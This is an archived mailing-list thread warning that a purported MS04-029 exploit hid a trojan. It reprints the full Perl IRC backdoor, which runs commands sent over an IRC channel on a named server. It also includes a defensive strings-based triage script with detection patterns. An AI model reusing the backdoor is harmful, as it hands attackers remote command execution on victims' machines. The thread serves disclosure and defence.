Metasploit mailing list archives
MS04-029 Exploit = trojan!
From: alekc at avet.com.pl (Aleksander P. Czarnowski)
Date: Thu, 4 Nov 2004 00:34:45 +0100
The sad or funny part (depends on your sense of humor) is that even if you don't bother reading the exploit source code before running it, you can still see the perl script with a simple strings command run against the binary. They could at least try to hide it a bit better on source code and binary level - after all, tools like metasploit framework are used by people who can read assembly too ;-)

Just my 2 cents,
Aleksander Czarnowski
AVET INS

-----Original Message-----
From: Jerome ATHIAS [mailto:jerome.athias at caramail.com]
Sent: Wednesday, November 03, 2004 11:09 PM
To: framework
Subject: [framework] MS04-029 Exploit = trojan!

#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER k +i k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#/tmp/hi

Doh! bad shit yes SORRY guys - too fast - too bad
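
The strings check mentioned in the message above, written as a repeatable triage step before running any downloaded proof-of-concept binary. This is an added example, not part of the original posts: the indicator list is an assumption derived from the script quoted above, and the sample bytes are constructed.

```python
import re
import sys

# Markers a reviewer would not expect inside a compiled exploit PoC.
# Assumed list for this example, modelled on the embedded script quoted above.
INDICATORS = {
    "script shebang": re.compile(rb"#!\s*/\S*bin/\S+"),
    "socket library": re.compile(rb"IO::Socket|/dev/tcp/"),
    "IRC protocol": re.compile(rb"\b(?:PRIVMSG|NICK|JOIN) "),
    "background fork": re.compile(rb"exit if fork"),
}

def printable_strings(data: bytes, min_len: int = 6):
    """Yield (offset, run) for printable ASCII runs, like strings(1)."""
    for m in re.finditer(rb"[\x20-\x7e\t]{%d,}" % min_len, data):
        yield m.start(), m.group()

def triage(data: bytes):
    """Return (offset, label) for every indicator found in a printable run."""
    findings = []
    for offset, run in printable_strings(data):
        for label, pattern in INDICATORS.items():
            if pattern.search(run):
                findings.append((offset, label))
    return findings

# Constructed sample: fake ELF header, a benign usage string, and an inert
# script fragment standing in for an embedded payload.
SAMPLE = (
    b"\x7fELF\x01\x01\x01\x00" + bytes(range(16))
    + b"Usage: %s <target>\x00\x00\x01\x02"
    + b'#!/usr/bin/perl use IO::Socket; print $sock "NICK placeholder";\x00'
)

if __name__ == "__main__":
    # Scan the file given on the command line, or the constructed sample.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for offset, label in triage(blob):
        print(f"0x{offset:08x}  {label}")
```

A hit is a reason to read the source and disassembly before execution, not proof of malice; an empty result proves nothing if the embedded script is encoded or packed.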
Current thread:
- MS04-029 Exploit = trojan! Jerome ATHIAS (Nov 03)
- MS04-029 Exploit = trojan! H D Moore (Nov 03)
- MS04-029 Exploit = trojan! Aleksander P. Czarnowski (Nov 03)